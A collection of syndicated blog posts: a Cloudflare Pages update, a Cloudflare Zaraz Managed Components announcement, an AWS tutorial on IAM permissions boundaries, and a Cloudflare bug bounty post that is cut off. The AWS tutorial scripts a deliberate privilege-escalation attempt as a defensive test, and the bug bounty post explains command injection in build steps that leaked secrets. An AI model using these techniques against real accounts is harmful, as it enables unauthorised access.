From beta testing, we noticed that our new infrastructure can be less impactful on larger projects that use heavier frameworks such as Gatsby. We believe that every user on our developer platform, regardless of their use case, has the right to fast builds. Up next, we will be implementing incremental builds to help Pages identify only the deltas between commits and rebuild only files that were directly updated. We will also be implementing other caching strategies such as caching external dependencies to save time on subsequent builds.

Build image updates

Because we’ve been using the same build image we launched Pages with back in 2021, we are going to make some major updates. Languages release new versions all the time, and we want to make sure we update and maintain the latest versions. An updated build image will mean faster builds, more security and of course supporting all the latest versions of languages and tools we provide. With new build image versions being released, we will allow users to opt in to the updated builds in order to maintain compatibility with all existing projects.

Productive error messaging

Lastly, while streaming build logs helps you to identify those easily addressable issues, the infamous “Internal error occurred” is sometimes a little more cryptic to decipher depending on the failure. While we recently published a “Debugging Cloudflare Pages” guide, in the future we’d like to provide the error feedback in a more productive manner, so you can easily identify the issue.

Have feedback?

As always, your feedback defines our roadmap. With all the updates we’ve made to our build experience, it’s important we hear from you! You can get in touch with our team directly through Discord. Navigate to our Pages specific section and check out our various channels specific to different parts of the product!

Join us at Cloudflare Connect!

Interested in learning more about building with Cloudflare Pages? If you’re based in the New York City area, join us on Thursday, May 12th for a series of workshops on how to build a full stack application on Pages! Follow along with a fully hands-on lab, featuring Pages in conjunction with other products like Workers, Images and Cloudflare Gateway, and hear directly from our product managers. Register now!

Open source Managed Components for Cloudflare Zaraz

Post Syndicated from Yo'av Moshe original https://blog.cloudflare.com/zaraz-open-source-managed-components-and-webcm/

Open source Managed Components for Cloudflare Zaraz

Open source Managed Components for Cloudflare Zaraz

In early 2020, we sat down and tried thinking if there’s a way to load third-party tools on the Internet without slowing down websites, without making them less secure, and without sacrificing users’ privacy. In the evening, after scanning through thousands of websites, our answer was “well, sort of”. It seemed possible: many types of third-party tools are merely collecting information in the browser and then sending it to a remote server. We could theoretically figure out what it is that they’re collecting, and then instead just collect it once efficiently, and send it server-side to their servers, mimicking their data schema. If we do this, we can get rid of loading their JavaScript code inside websites completely. This means no more risk of malicious scripts, no more performance losses, and fewer privacy concerns.

But the answer wasn’t a definite “YES!” because we realized this is going to be very complicated. We looked into the network requests of major third-party scripts, and often it seemed cryptic. We set ourselves up for a lot of work, looking at the network requests made by tools and trying to figure out what they are doing – What is this parameter? When is this network request sent? How is this value hashed? How can we achieve the same result more securely, reliably and efficiently? Our team faced these questions on a daily basis.

When we joined Cloudflare, the scale of everything changed. Suddenly we were on thousands of websites, serving more than 10,000 requests per second. Users are writing to us every single day over our Discord channel, the community forum, and sometimes even directly on Twitter. More often than not, their messages would be along the lines of “Hi! Can you please add support for X?” Cloudflare Zaraz launched with around 30 tools in its library, but this market is vast and new tools are popping up all the time.

Changing our trust model

In my previous blog post on how Zaraz uses Cloudflare Workers, I included some examples of how tool integrations are written in Zaraz today. Usually, a “tool” in Zaraz would be a function that prepares a payload and sends it. This function could return one thing – clientJS, JavaScript code that the browser would later execute. We’ve done our best so that tools wouldn’t use clientJS, if it wasn’t really necessary, and in reality most Zaraz-built tool integrations are not using clientJS at all.

This worked great, as long as we were the ones coding all tool integrations. Customers trusted us that we’d write code that is performant and safe, and they trusted the results they saw when trying Zaraz. Upon joining Cloudflare, many third-party tool vendors contacted us and asked to write a Zaraz integration. We quickly realized that our system wasn’t enforcing speed and safety – vendors could literally just dump their old browser-side JavaScript into our clientJS variable, and say “We have a Cloudflare Zaraz integration!”, and that wasn’t our vision at all.

We want third-party tool vendors to be able to write their own performant, safe server-side integrations. We want to make it possible for them to reimagine their tools in a better way. We also want website owners to have transparency into what is happening on their website, to be able to manage and control it, and to trust that if a tool is running through Zaraz, it must be a good tool — not because of who wrote it, but because of the technology it is constructed within. We realized that to achieve that we needed a new format for defining third-party tools.

Introducing Managed Components

We started rethinking how third-party code should be written. Today, it’s a black box – you usually add a script to your site, and you have zero clue what it does and when. You can’t properly read or analyze the minified code. You don’t know if the way it behaves for you is the same way it behaves for everyone else. You don’t know when it might change. If you’re a website owner, you’re completely in the dark.

Tools do many different things. The simple ones just collected information and sent it somewhere. Often, they’d set some cookies. Sometimes, they’d install some event listeners on the page. And widget-based tools can literally manipulate the page DOM, providing new functionality like a social media embed or a chatbot. Our new format needed to support all of this.

Managed Components is how we imagine the future of third-party tools online. It provides vendors with an API that allows them to do much more than a normal script can, including keeping code execution outside the browser. We designed this format together with vendors, for vendors, while having in mind that users’ best interest is everyone’s best interest long-term.

From the get-go, we built Managed Components to use a permission-based system. We want to provide even more transparency than Zaraz does today. As the new API allows tools to set cookies, change the DOM or collect IP addresses, all those abilities require being granted a permission. Installing a third-party tool on your site is similar to installing an app on your phone – you get an explanation of what the tool can and can’t do, and you can allow or disallow features to a granular level. We previously wrote about how you can use Zaraz to not send IP addresses to Google Analytics, and now we’re doubling down in this direction. It’s your website, and it’s your decision to make.

Every Managed Component is a JavaScript module at its core. Unlike today, this JavaScript code isn’t sent to the browser. Instead, it is executed by a Components Manager. This manager implements the APIs that are then used by the component. It dispatches server-side events that originate in the browser, providing the components with access to information while keeping them sandboxed and performant. It handles caching, storage and more — all so that the Managed Components can implement their logic without worrying so much about the surrounding.

An example analytics Managed Component can look something like this:

export default function (manager) {
  manager.addEventListener("pageview", ({ context, client }) => {
    fetch("https://example.com/collect", {
  	method: "POST",
  	data: {
    	  url: context.page.url.href,
    	  userAgent: client.device.userAgent,

The above component gets notified whenever a page view occurs, and it then creates some payload with the visitor user-agent and page URL and sends that as a POST request to the vendor’s server. This is very similar to how things are done today, except this doesn’t require running any code at all in the browser.

But Managed Components aren’t just doing what was previously possible but better, they also provide dramatic new functionality. See for example how we’re exposing server-side endpoints:

export default function (manager) {
  const api = manager.proxy("/api", "https://api.example.com");
  const assets = manager.serve("/assets", "assets");
  const ping = manager.route("/ping", (request) => new Response(204));

These three lines are a complete shift in what’s possible for third-parties. If granted the permissions, they can proxy some content, serve and expose their own endpoints – all under the same domain as the one running the website. If a tool needs to do some processing, it can now off-load that from the browser completely without forcing the browser to communicate with a third-party server.

Exciting new capabilities

Every third-party tool vendor should be able to use the Managed Components API to build a better version of their tool. The API we designed is comprehensive, and the benefits for vendors are huge:

  • Same domain: Managed Components can serve assets from the same domain as the website itself. This allows a faster and more secure execution, as the browser needs to trust and communicate with only one server instead of many. This can also reduce costs for vendors as their bandwidth will be lowered.
  • Website-wide events system: Managed Components can hook to a pre-existing events system that is used by the website for tracking events. Not only is there no need to provide a browser-side API to your tool, it’s also easier for your users to send information to your tool because they don’t need to learn your methods.
  • Server logic: Managed Components can provide server-side logic on the same domain as the website. This includes proxying a different server, or adding endpoints that generate dynamic responses. The options are endless here, and this, too, can reduce the load on the vendor servers.
  • Server-side rendered widgets and embeds: Did you ever notice how when you’re loading an article page online, the content jumps when some YouTube or Twitter embed suddenly appears between the paragraphs? Managed Components provide an API for registering widgets and embed that render server-side. This means that when the page arrives to the browser, it already includes the widget in its code. The browser doesn’t need to communicate with another server to fetch some tweet information or styling. It’s part of the page now, so expect a better CLS score.
  • Reliable cross-platform events: Managed Components can subscribe to client-side events such as clicks, scroll and more, without needing to worry about browser or device support. Not only that – those same events will work outside the browser too – but we’ll get to that later.
  • Pre-Response Actions: Managed Components can execute server-side actions before the network response even arrives in the browser. Those actions can access the response object, reading it or altering it.
  • Integrated Consent Manager support: Managed Components are predictable and scoped. The Component Manager knows what they’ll need and can predict what kind of consent is needed to run them.

The right choice: open source

As we started working with vendors on creating a Managed Component for their tool, we heard a repeating concern – “What Components Managers are there? Will this only be useful for Cloudflare Zaraz customers?”. While Cloudflare Zaraz is indeed a Components Manager, and it has a generous free tier plan, we realized we need to think much bigger. We want to make Managed Components available for everyone on the Internet, because we want the Internet as a whole to be better.

Today, we’re announcing much more than just a new format.

WebCM is a reference implementation of the Managed Components API. It is a complete Components Manager that we will soon release and maintain. You will be able to use it as an SDK when building your Managed Component, and you will also be able to use it in production to load Managed Components on your website, even if you’re not a Cloudflare customer. WebCM works as a proxy – you place it before your website, and it rewrites your pages when necessary and adds a couple of endpoints. This makes WebCM 100% framework-agnostic – it doesn’t matter if your website uses Node.js, Python or Ruby behind the scenes: as long as you’re sending out HTML, it supports that.

That’s not all though! We’re also going to open source a few Managed Components of our own. We converted some of our classic Zaraz integrations to Managed Components, and they will soon be available for you to use and improve. You will be able to take our Google Analytics Managed Component, for example, and use WebCM to run Google Analytics on your website, 100% server-side, without Cloudflare.

Tech-leading vendors are already joining

Revolutionizing third-party tools on the internet is something we could only do together with third-party vendors. We love third-party tools, and we want them to be even more popular. That’s why we worked very closely with a few leading companies on creating their own Managed Components. These new Managed Components extend Zaraz capabilities far beyond what’s possible now, and will provide a safe and secure onboarding experience for new users of these tools.

Open source Managed Components for Cloudflare Zaraz

DriftDrift helps businesses connect with customers in moments that matter most.  Drift’s integration will let customers use their fully-featured conversation solution while also keeping it completely sandboxed and without making third-party network connections, increasing privacy and security for our users.

Open source Managed Components for Cloudflare Zaraz

CrazyEggCrazy Egg helps customers make their websites better through visual heatmaps, A/B testing, detailed recordings, surveys and more. Website owners, Cloudflare, and Crazy Egg all care deeply about performance, security and privacy. Managed Components have enabled Crazy Egg to do things that simply aren’t possible with third-party JavaScript, which means our mutual customers will get one of the most performant and secure website optimization tools created.

We also already have customers that are eager to implement Managed Components:

Open source Managed Components for Cloudflare Zaraz

Hopin Quote:

“I have been really impressed with Cloudflare’s Zaraz ability to move Drift’s JS library to an Edge Worker while loading it off the DOM. My work is much more effective due to the savings in page load time. It’s a pleasure to work with two companies that actively seek better ways to increase both page speed and load times with large MarTech stacks.”
– Sean Gowing, Front End Engineer, Hopin

If you’re a third-party vendor, and you want to join these tech-leading companies, do reach out to us, and we’d be happy to support you on writing your own Managed Component.

What’s next for Managed Components

We’re working on Managed Components on many fronts now. While we develop and maintain WebCM, work with vendors and integrate Managed Components into Cloudflare Zaraz, we’re already thinking about what’s possible in the future.

We see a future where many open source runtimes exist for Managed Components. Perhaps your infrastructure doesn’t allow you to use WebCM? We want to see Managed Components runtimes created as service workers, HTTP servers, proxies and framework plugins. We’re also working on making Managed Components available on mobile applications. We’re working on allowing unofficial Managed Components installs on Cloudflare Zaraz. We’re fixing a long-standing issue of the WWW, and there’s so much to do.

We will very soon publish the full specs of Managed Components. We will also open source WebCM, the reference implementation server, as well as many components you can use yourself. If this is interesting to you, reach out to us at [email protected], or join us on Discord.

How to let builders create IAM resources while improving security and agility for your organization

Post Syndicated from Jeb Benson original https://aws.amazon.com/blogs/security/how-to-let-builders-create-iam-resources-while-improving-security-and-agility-for-your-organization/

Many organizations restrict permissions to create and manage AWS Identity and Access Management (IAM) resources to a group of privileged users or a central team. This post explains how you can safely grant these permissions to builders – the people who are developing, testing, launching, and managing cloud infrastructure – to speed up your development, increase your agility, and improve your application security. In addition, you will use an example application stack to see how IAM permissions boundaries can help establish a secure, yet agile work environment for builders.

An example application stack

Defining and creating IAM resources within the application stack allows your builders to craft policies and roles that grant least privilege to application resources. When builders are entitled to create IAM resources, it is straightforward for them to scope policies by referencing the application resources directly in the IAM policies in the same template.

To illustrate this point you will build a simple “hello world” serverless application. The application includes an AWS Step Functions state machine that, once executed, will invoke an AWS Lambda function. You will use this example application along with some IAM policies and IAM roles to illustrate how you can use permissions boundaries to safely grant IAM privileges to builders.

In this example AWS CloudFormation template, the Resource element in MyStateMachineExecutionRole, which is specified as the role for MyStateMachine, includes a reference to the Amazon Resource Name (ARN) of MyLambdaFunction. This is a great example of the principle of least privilege as MyStateMachine will only have permissions to invoke MyLambdaFunction. Making this association is straightforward because the IAM, Step Functions, and Lambda resources are defined together in the same template.

Example application template

AWSTemplateFormatVersion: 2010-09-09
Description: builder-application


	Type: AWS::IAM::Role
			Version: 2012-10-17
				- Effect: Allow
					- lambda.amazonaws.com
				Action: sts:AssumeRole
			- PolicyName: MyLambdaFunctionBasicExecutionPolicy
				Version: 2012-10-17
					- Effect: Allow
						- logs:CreateLogGroup
						- logs:CreateLogStream
						- logs:PutLogEvents
					Resource: !Sub arn:${AWS::Partition}:logs:${AWS::Region}:${AWS::AccountId}:log-group:*

  	Type: AWS::Lambda::Function
		Runtime: python3.8
		Role: !GetAtt MyLambdaFunctionExecutionRole.Arn
		Handler: index.handler
			ZipFile: |
				def handler(event, context):
					return("Hello Builder!")
		Timeout: 30

	Type: AWS::IAM::Role
			Version: 2012-10-17
				- Effect: Allow
					- states.amazonaws.com
				Action: sts:AssumeRole
			- PolicyName: StateMachineExecutionPolicy
				Version: 2012-10-17
					- Effect: Allow
						- lambda:InvokeFunction
					Resource: !GetAtt MyLambdaFunction.Arn
	Type: AWS::StepFunctions::StateMachine
		DefinitionString: !Sub |
            "StartAt": "State1",
            "States": {
              "State1": {
                "Type": "Task",
                "Resource": "${MyLambdaFunction.Arn}",
                "End": true
		RoleArn: !GetAtt MyStateMachineExecutionRole.Arn

	Type: AWS::Lambda::Permission
	  Action: lambda:InvokeFunction
	  FunctionName: !Ref MyLambdaFunction
	  Principal: states.amazonaws.com
	  SourceArn: !Ref MyStateMachine

In an organization that uses a centralized approach to IAM management, a builder would not be able to deploy this example application because the roles the builders are granted prohibit IAM actions related to creating and managing roles and policies. This creates three key challenges for the organization:

  1. Builders often rely on a security or cloud team to create IAM resources. This approach adds an additional burden to that team which slows down development while builders wait for the roles and policies to be created, and encourages the team to grant overly-broad permissions so that they don’t have to be involved in the precise details of changes on a daily basis.
  2. IAM resources must be created before the rest of the stack, which makes it much more difficult to create least-privilege policies and roles.
  3. The code for IAM and application infrastructure is maintained separately, which requires extra coordination when creating and updating workloads.

Removing these challenges can simplify your cloud development, lower the amount of overhead and coordination required across your organization, and improve your security posture. Further, reducing the burden on your security team can free up time for them to focus on enforcing additional data perimeters and implementing best practices from the security pillar of the AWS Well-Architected Framework.

Use permissions boundaries on application roles created by builders

So how can your organization shift to a decentralized approach to IAM management and allow builders to safely create application IAM policies and roles, as well as prevent builders from being able to escalate their own privileges? This is a scenario where permissions boundaries should be used.

Permissions boundaries allow an IAM policy to be attached to an IAM role to enforce limits on the permissions that role can be granted. The permissions boundary itself does not grant any permissions – it’s just a guardrail that defines the maximum entitlements. You can create a builder policy that requires a specified permissions boundary be attached to any application roles that a builder creates, effectively setting the maximum permissions on any role that a builder can generate. The permissions for any application roles created will be the intersection of the application policies and the permissions boundary associated with the application role. Said another way, a permission granted in the application policy must also be granted in the permissions boundary, or else it will be implicitly denied according to the policy evaluation logic.

The set of permissions required for builder roles (assumed by actual people or CI/CD pipelines) to deploy infrastructure and develop applications are different than those required for application roles (assumed by workloads/applications) to execute within applications and workflows. If you think of permissions in terms of control plane actions involved in creating, deleting, and modifying resources, versus data plane actions needed to execute the daily business of those resources, builder and application roles typically operate more on the control plane and data plane, respectively. While permissions policies attached to application roles should be tightly scoped to include only those actions needed to perform a specific task, policies for permissions boundaries should be highly reusable and include a broad set of permissions across a suite of services that a variety of applications might need. In addition, it is a best practice to not share roles between humans and services. To summarize, policies for builder and application roles should be designed with the following criteria in mind:

Policy Role Permissions Scope Reusability User
builder builder control plane broad high human
application application data plane specific low service
application-boundary application data plane broad high application role

Following the steps in this section, you will create:

  1. A builder policy that grants builders permissions for services needed to deploy and manage applications, and to create and manage IAM policies and roles for those applications.
  2. An application-boundary policy that defines the extent of the permissions any application role created by a builder can have.
  3. A builder role with the builder policy attached as the permissions policy, the application-boundary policy attached as a permissions boundary, and a trust policy that allows anyone in the account to assume the builder role.

Create the builder IAM resources

In this first procedure, you will use CloudFormation to create the builder and application-boundary IAM policies, and the builder IAM role.

To launch the builder IAM stack

  1. Open a Linux terminal with the AWS Command Line Interface (CLI) installed and AWS credentials configured for a user or role that has permissions to create IAM resources.
  2. Launch the builder IAM stack by using the following command:
    aws cloudformation create-stack \
    --stack-name builder-iam \
    --template-url https://awsiammedia.s3.amazonaws.com/public/sample/993-grant-IAM-permissions-for-builders+/builder-iam.json \
    --capabilities CAPABILITY_NAMED_IAM

The builder policy you created uses paths to organize IAM policies and roles into isolated “spaces” that can be specified as resource constraints. It also requires roles to have a permissions boundary attached. This approach helps manage role delegation and prevents builders from escalating their privileges or modifying roles that may be used by other teams.

Note that paths can only be added to IAM resources using the AWS CLI or APIs – not via the console. If this is an issue, another option is to specify that policies and roles start with a specific phrase, for example “application-roles-*”. Just be sure to use different phrases for the builder, application, and permissions boundaries resources to maintain isolation and prevent builders from being able to escalate their privileges.

The builder policy also includes some basic control plane permissions, while the application-boundary policy you created includes permissions used across a suite of services that a typical serverless application might need. However, both policies are only meant to demonstrate the concepts in this blog post. In practice, you will need to create policies that more accurately reflect the permissions needed by builder and application roles in your organization. See the example-permissions-boundaries repository on the AWS Samples GitHub site for more ideas.

Use the builder role to launch an application stack

In this section you will assume the builder role and verify that you can launch the application stack, including the application roles, but only if the required permissions boundary and path are specified.

To test launching a stack that creates application roles

  1. Assume the builder role by using the following set of commands (copy and paste into the terminal as a single block). This step uses the jq program, which is available in most operating system package repositories.
    export AWS_DEFAULT_OUTPUT="json"; \
    role=builder; \
    aws_role=$(aws iam get-role --role-name $role); \
    role_arn=$(echo $aws_role|jq '.Role.Arn'|tr -d '"'); \
    aws_credentials=$(aws sts assume-role --role-arn $role_arn --role-session-name builder-test); \
    export AWS_ACCESS_KEY_ID=$(echo $aws_credentials|jq '.Credentials.AccessKeyId'|tr -d '"'); \
    export AWS_SECRET_ACCESS_KEY=$(echo $aws_credentials|jq '.Credentials.SecretAccessKey'|tr -d '"'); \
    export AWS_SESSION_TOKEN=$(echo $aws_credentials|jq '.Credentials.SessionToken'|tr -d '"')

    You will use this role for all of the following procedures up until the “Clean up” section. If, during the course of this exercise, you get an error that “The security token included in the request is expired”, create a new terminal and repeat this step to get a fresh set of credentials.

    The trust policy for the builder role allows any principal in the account to assume it. You can use a combination of the Principal and Condition attributes to further reduce its scope. Normally builder roles are assumed directly via federation or AWS SSO.

  2. Check that the you have now assumed the builder role by using the following command:
    aws sts get-caller-identity

  3. Launch the example application stack by using the following command:
    aws cloudformation create-stack \
    --stack-name builder-application \
    --template-url https://awsiammedia.s3.amazonaws.com/public/sample/993-grant-IAM-permissions-for-builders+/builder-application-1.yml \
    --capabilities CAPABILITY_NAMED_IAM

  4. If things are set up correctly, the stack will fail. To confirm, check the StackStatus by using the following command – it should show ROLLBACK_IN_PROGRESS or ROLLBACK_COMPLETE.
    aws cloudformation describe-stacks \
    --stack-name builder-application | jq '.Stacks[].StackStatus'

  5. The stack failed to create because the builder role you assumed does not have permissions to create the two application roles without specifying the /application_roles/ path and attaching a permissions boundary with /permissions_boundaries/ in the path. To see the details, use the following command:
    aws cloudformation describe-stack-events \
    --stack-name builder-application | jq '.StackEvents[] | select(.ResourceStatus=="CREATE_FAILED") | .ResourceStatusReason'

  6. If the original stack did not create successfully, you will not be able to update it, so you will need to delete it instead by using the following command:
    aws cloudformation delete-stack \
    --stack-name builder-application

  7. Launch a new stack with an updated template that includes the required path and permissions boundary by using the following command:
    aws cloudformation create-stack \
    --stack-name builder-application \
    --template-url https://awsiammedia.s3.amazonaws.com/public/sample/993-grant-IAM-permissions-for-builders+/builder-application-2.yml \
    --capabilities CAPABILITY_NAMED_IAM

  8. After a few minutes, confirm the stack was successfully created by using the following command and verifying StackStatus is CREATE_COMPLETE:
    aws cloudformation describe-stacks \
    --stack-name builder-application | jq '.Stacks[].StackStatus'

To verify the application is working

  1. Start an execution of the state machine and verify the application is working by using the following commands. Run them one at a time to allow the execution to finish.
    state_machine_arn=$(aws cloudformation describe-stack-resources --stack-name builder-application | jq '.StackResources[] | select (.LogicalResourceId=="MyStateMachine") | .PhysicalResourceId' | tr -d '"')
    execution_arn=$(aws stepfunctions start-execution --state-machine-arn $state_machine_arn | jq '.executionArn' | tr -d '"')
    aws stepfunctions describe-execution --execution-arn $execution_arn | jq '.output'

    If the output is “\”Hello Builder!\””, then the application is working.

Test that a builder can’t escalate their privileges

In this section, you will test scenarios where a builder attempts, intentionally or not, to escalate their privileges by first modifying the policies attached to the builder role and then extending the permissions of an application role beyond the permissions boundary.

To test updating a builder policy attached to the builder role

  1. Create an environment variable for your AWS account number, which will be used in several of the steps below, using the following command:
    export AWS_ACCOUNT=$(aws sts get-caller-identity | jq '.Account' | tr -d '"')

  2. Retrieve the builder policy and save it to a file by using the following command:
    aws iam get-policy-version \
    --policy-arn arn:aws:iam::$AWS_ACCOUNT:policy/builder_policies/builder \
    --version-id v1 | jq '.PolicyVersion.Document' > builder-policy.json

  3. Add the following JSON block to the “Statement” array in the builder-policy.json file and save the changes.
    	"Sid": "SneakyBuilder",
    	"Effect": "Allow",
    	"Action": "*",
    	"Resource": "*"

  4. Try to update the builder policy and set it as the default version by using the following command:
    aws iam create-policy-version \
    --policy-arn arn:aws:iam::$AWS_ACCOUNT:policy/builder_policies/builder \
    --policy-document file://builder-policy.json \

    You should get an AccessDenied error because the builder role can only modify policies in the /application_policies/ space.

To test adding an application policy to the builder role

  1. Save a copy of builder-policy.json as a new file called sneaky-policy.json using the following command:
    cp builder-policy.json sneaky-policy.json

  2. Create the new policy using the following command:
    aws iam create-policy \
    --policy-name sneaky-policy \
    --path /application_policies/ \
    --policy-document file://sneaky-policy.json

    You should not get an error in this step because you are creating a new policy that complies with the resource constraint for the statement that includes the iam:CreatePolicy permission in the builder policy. But, it’s just a policy for now – it can’t have any effect unless attached to a role.

  3. Now try to attach this new policy to the builder role by using the following command:
    aws iam attach-role-policy \
    --role-name builder \
    --policy-arn arn:aws:iam::$AWS_ACCOUNT:policy/application_policies/sneaky-policy

    You should get an error because you’re attempting to attach a policy to a role that’s not in the /application-roles/ space, in this case the builder role.

To test modifying an application role with actions outside the permissions boundary

In this procedure, you will attempt to escalate the privileges of the MyLambdaFunctionExecutionRole by adding an action (s3:CreateBucket) that is outside of the permissions boundary attached to the role and then attempting to execute that action when MyLambdaFunction is invoked.

  1. Update the builder-application stack by using the following command:
    aws cloudformation update-stack \
    --stack-name builder-application \
    --template-url https://awsiammedia.s3.amazonaws.com/public/sample/993-grant-IAM-permissions-for-builders+/builder-application-3.yml \
    --capabilities CAPABILITY_NAMED_IAM

  2. After a few minutes, confirm the stack was successfully updated by using the following command and verifying StackStatus is UPDATE_COMPLETE:
    aws cloudformation describe-stacks \
    --stack-name builder-application | jq '.Stacks[].StackStatus'

  3. Start an execution of the state machine and verify the result by using the following commands. Run them one at a time to allow the execution to finish.
    state_machine_arn=$(aws cloudformation describe-stack-resources --stack-name builder-application | jq '.StackResources[] | select (.LogicalResourceId=="MyStateMachine") | .PhysicalResourceId' | tr -d '"')
    execution_arn=$(aws stepfunctions start-execution --state-machine-arn $state_machine_arn | jq '.executionArn' | tr -d '"')
    aws stepfunctions describe-execution --execution-arn $execution_arn | jq '.status'

    The status should be FAILED. Remember – the effective permissions for any application roles will be the intersection of the attached permissions policies and the permissions boundary. Thus, this execution failed because even though you were able to modify the inline policy of the Lambda function to add s3:CreateBucket, since that action is not allowed in the application-boundary policy attached to the Lambda as a permissions boundary, the request to create an S3 bucket was denied.

  4. Get the name of the latest log stream by using the following commands:
    lambda_function_name=$(aws cloudformation describe-stack-resources --stack-name builder-application | jq '.StackResources[] | select (.LogicalResourceId=="MyLambdaFunction") | .PhysicalResourceId' | tr -d '"')
    aws logs describe-log-streams \
    --log-group-name /aws/lambda/$lambda_function_name \
    --order-by LastEventTime \
    --descending | jq -r '.logStreams[0].logStreamName'

  5. To verify the actual error was due to a lack of permissions, get the event message by using the following command, replacing <value> with the value of the log stream copied in the step above. If using a bash terminal, you will need to escape any dollar signs in <value> with a backslash character:
    aws logs get-log-events \
    --log-group-name /aws/lambda/$lambda_function_name \
    --log-stream-name <value> | jq '.events[] | select (.message | contains("[ERROR]"))'

    The error should read [ERROR] ClientError: An error occurred (AccessDenied) when calling the CreateBucket operation: Access Denied, which confirms that the permissions boundary prevented you from escalating your privileges as a builder via an application role.

You have now verified that you can safely allow builders to create IAM policies and roles!

Clean up

After you have finished testing, clean up the resources created in this example. Because the builder role does not have permissions to delete builder policies and roles, you will need to assume a different role that can manage IAM resources to complete step 3 below. If you create a new terminal session, make sure the AWS_ACCOUNT environment variable is set.

To clean up

  1. Delete the builder-application stack by using the following command:
    aws cloudformation delete-stack --stack-name builder-application

  2. Delete the sneaky-policy by using the following command:
    aws iam delete-policy \
    --policy-arn arn:aws:iam::$AWS_ACCOUNT:policy/application_policies/sneaky-policy

  3. Delete the builder-iam stack by using the following command:
    aws cloudformation delete-stack --stack-name builder-iam

Service control policies

Permissions boundaries are applied to individual IAM users or roles within an account. If your organization has multiple accounts, you must create and maintain these boundaries in each account for each individual user or role. But what if you’d like to apply a subset of these rules or others across some or all of your accounts? In this case, you could use service control policies (SCPs), which are a feature of AWS Organizations, to provide central control over the maximum available permissions for multiple accounts in your organization. By organizing accounts into organizational units (OUs), which are groups of accounts that serve an application or service, you can apply service control policies (SCPs) to create targeted governance boundaries for your OUs. To learn more about creating SCPs, see Get more out of service control policies in a multi-account environment in the AWS Security Blog.

Additional tools

Creating and managing tightly scoped policies and roles is an ongoing process that requires a lot of thought and attention to detail. AWS IAM enables fine-grained access control to AWS services, and permissions boundaries are an advanced feature. There is no substitute for actual testing like you performed in the “Test that a builder can’t escalate their privileges” section above, however you can also use the IAM Policy Simulator as a tool to test policies and determine whether or not specific actions are allowed for a given user, group, or role. Additional tools you can use to create, audit, and update IAM policies include:

  • Access Advisor – to review when services and actions were last accessed.
  • Access Analyzer – to help identify resources in your organization and accounts that are shared with an external identity, validate IAM policies against policy grammar and best practices, and generate IAM policies based on access activity in your AWS CloudTrail logs.
  • AWS Cloud Development Kit (CDK) – has built-in convenience methods to help you follow best practices, including the ability to generate least-privilege policies for cloud applications with a single line of code.
  • Open Source tools like cfn-nag and cdk-nag – to inspect CloudFormation templates and CDK applications for patterns that may indicate insecure infrastructure, for example IAM policies that are too permissive.


In this post, you learned how to put policies and guardrails in place that will allow your organization to grant IAM permissions to builders. These changes will enable your builders to develop and deploy cloud infrastructure and applications more rapidly, and will help strengthen your organization’s security culture by extending the responsibility to a broader group. To learn more about creating, testing, and refining IAM policies and permissions boundaries, see Creating IAM policies, Testing IAM policies, and Refining permissions using access information in the IAM User Guide, and IAM policy types: How and when to use them in the AWS Security Blog.

The Cloudflare Bug Bounty program and Cloudflare Pages

Post Syndicated from Evan Johnson original https://blog.cloudflare.com/pages-bug-bounty/

The Cloudflare Bug Bounty program and Cloudflare Pages

The Cloudflare Bug Bounty program and Cloudflare Pages

The Cloudflare Pages team recently collaborated closely with security researchers at Assetnote through our Public Bug Bounty. Throughout the process we found and have fully patched vulnerabilities discovered in Cloudflare Pages. You can read their detailed write-up here. There is no outstanding risk to Pages customers. In this post we share information about the research that could help others make their infrastructure more secure, and also highlight our bug bounty program that helps to make our product more secure.

Cloudflare cares deeply about security and protecting our users and customers — in fact, it’s a big part of the reason we’re here. But how does this manifest in terms of how we run our business? There are a number of ways. One very important prong of this is our bug bounty program that facilitates and rewards security researchers for their collaboration with us.

But we don’t just fix the security issues we learn about — in order to build trust with our customers and the community more broadly, we are transparent about incidents and bugs that we find.

Recently, we worked with a group of researchers on improving the security of Cloudflare Pages. This collaboration resulted in several security vulnerability discoveries that we quickly fixed. We have no evidence that malicious actors took advantage of the vulnerabilities found. Regardless, we notified the limited number of customers that might have been exposed.

In this post we are publicly sharing what we learned, and the steps we took to remediate what was identified. We are thankful for the collaboration with the researchers, and encourage others to use the bounty program to work with us to help us make our services — and by extension the Internet — more secure!

What happens when a vulnerability is reported?

Once a vulnerability has been reported via HackerOne, it flows into our vulnerability management process:

  1. We investigate the issue to understand the criticality of the report.
  2. We work with the engineering teams to scope, implement, and validate a fix to the problem. For urgent problems we start working with engineering immediately, and less urgent issues we track and prioritize alongside engineering’s normal bug fixing cadences.
  3. Our Detection and Response team investigates high severity issues to see whether the issue was exploited previously.

This process is flexible enough that we can prioritize important fixes same-day, but we never lose track of lower criticality issues.

What was discovered in Cloudflare Pages?

The Pages team had to solve a pretty difficult problem for Cloudflare Builds (our CI/CD build pipeline): how can we run untrusted code safely in a multi-tenant environment? Like all complex engineering problems, getting this right has been an iterative process. In all cases, we were able to quickly and definitively address bugs reported by security researchers. However, as we continued to work through reports by the researchers, it became clear that our initial build architecture decisions provided too large an attack surface. The Pages team pivoted entirely and re-architected our platform in order to use gVisor and further isolate builds.

When determining impact, it is not enough to find no evidence that a bug was exploited, we must conclusively prove that it was not exploited. For almost all the bugs reported, we found definitive signals in audit logs and were able to correlate that data exclusively against activity by trusted security researchers.

However, for one bug, while we found no evidence that the bug was exploited beyond the work of security researchers, we were not able meaningfully prove that it was not. In the spirit of full transparency, we notified all Pages users that may have been impacted.

Now that all the issues have been remedied, and individual customers have been notified, we’d like to share more information about the issues.

Bug 1: Command injection in CLONE_REPO

With a flaw in our logic during build initialization, it was possible to execute arbitrary code, echo environment variables to a file and then read the contents of that file.

The Cloudflare Bug Bounty program and Cloudflare Pages

The crux of the bug was that root_dir in this line of code was attacker controlled. After gaining control the researcher was able to specially craft a malicious root_dir to dump the environment variables of the process to a file. Those environment variables contained our GitHub bot’s authorization key. This would have allowed the attacker to read the repositories of other Pages’ customers, and many of those repositories are private.

The Cloudflare Bug Bounty program and Cloudflare Pages

After fixing the input validation for this field to prevent the bug, and rolling the disclosed keys, we investigated all other paths that had ever been set by our Pages customers to see if this attack had ever been performed by any other (potentially malicious) security researchers. We had logs showing that this was the first this particular attack had ever been performed, and responsibly reported.

Bug 2: Command injection in PUBLISH_ASSETS

This bug is nearly identical to the first one, but on the publishing step instead of the clone step. We went to work rotating the secrets that were exposed, fixing the input validation issues, and rotating the exposed secrets. We investigated the Cloudflare audit logs to confirm that the sensitive credentials had not been used by anyone other than our build infrastructure, and within the scope of the security research being performed.

Bug 3: Cloudflare API key disclosure in the asset publishing process

